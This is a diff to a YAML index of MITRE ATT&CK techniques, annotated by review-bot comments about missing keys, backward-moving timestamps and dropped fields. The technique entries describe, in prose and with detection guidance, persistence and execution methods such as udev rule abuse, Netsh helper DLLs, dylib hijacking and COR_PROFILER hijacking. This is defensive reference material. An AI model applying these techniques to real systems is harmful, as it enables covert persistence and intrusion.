+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
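Review bot: the new `T1546.017` entry goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []` with no `identifier: T1546.017` line, whereas the neighbouring `T1055.001` and `T1053.002` entries in this region each carry an `identifier:` key before `atomic_tests`; add it so tooling that reads the key treats this technique like its siblings. Two smaller points in the same block: the `x_mitre_detection` text names three rule directories while the description lists five (`/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/` are missing from the detection guidance, and a file-monitoring rule built from the detection text alone would miss them), and `/usr/lib/udev/rules.d/` in that string lacks the backticks its neighbours have.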
@@ -24008,7 +24329,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
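Review bot: the `modified` timestamp for T1546.007 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:09:17.363Z`; the same regression appears for T1574.004 (2023-10-31 to 2023-03-30), T1574.012 (2022-04-25 to 2021-08-30) and T1559.001 (2022-04-25 to 2021-07-26) further down this diff, while other objects move forward to October 2024. A `modified` value that goes back in time usually means the index was regenerated from a different STIX source than the previous run; confirm the source bundle before merging, since downstream change detection keyed on `modified` would otherwise treat these as untouched or older.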
@@ -24032,12 +24353,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24121,11 +24441,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24177,9 +24496,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24228,7 +24546,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24266,30 +24584,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
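Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1574.012 alongside `spec_version: '2.1'` with no replacement visible in the hunk; elsewhere in this diff the same pair is removed and an `x_mitre_attack_spec_version: 3.2.0` line is re-added further down the object (T1059.007, T1053.003), so confirm T1574.012 is re-added too rather than silently losing the field. Separately, the rewritten T1053.005 description drops the sentence noting that `at.exe` cannot see tasks created with `schtasks` or the Control Panel; if that is intentional upstream text removal it is fine, but it is worth confirming it was not lost in the reflow.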
@@ -24336,7 +24653,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24368,8 +24685,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24383,6 +24700,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -24395,16 +24716,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24470,7 +24794,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24547,66 +24870,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24619,31 +24887,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
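Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM) is removed from T1059.007 and not re-added anywhere in the reordered block, while `x_mitre_deprecated: false`, `x_mitre_remote_support: false` and `revoked: false` are introduced; T1053.003 later in this diff keeps its `x_mitre_permissions_required: - User` through the same reordering. If the drop reflects the upstream object it should be called out in the commit message, because any consumer that filters techniques on required permissions will stop seeing T1059.007. The rest of the block is a pure reorder: every key removed from the top of the object (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) reappears below with the same values, and `x_mitre_version` moves from '2.1' to '2.2'.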
@@ -24701,9 +25021,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -24795,20 +25114,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -24836,7 +25154,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -24856,33 +25174,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24899,6 +25197,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -24909,9 +25208,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -24919,8 +25222,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -24960,7 +25279,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
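Review bot: the `modified` timestamp for T1559.001 moves backwards, from `'2022-04-25T14:00:00.188Z'` to `'2021-07-26T22:51:20.448Z'`. A regeneration from newer ATT&CK data should not yield an older `modified` value, so either the source snapshot for this object is stale or the generator now reads a different field; worth checking before merge, since consumers that compare `modified` to detect updates will treat this object as unchanged or older. The same regression appears in the T1059.008 hunk further down (`'2022-05-11'` to `'2022-04-19'`).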
@@ -24985,12 +25304,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
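Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1559.001 with no replacement in the visible context, while every other object in this change receives `x_mitre_attack_spec_version: 3.2.0`. Confirm the key is re-emitted elsewhere in this object (the earlier T1559.001 hunk only touches `modified`); otherwise this object silently loses its spec version.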
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25070,11 +25387,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25134,12 +25450,11 @@ execution:
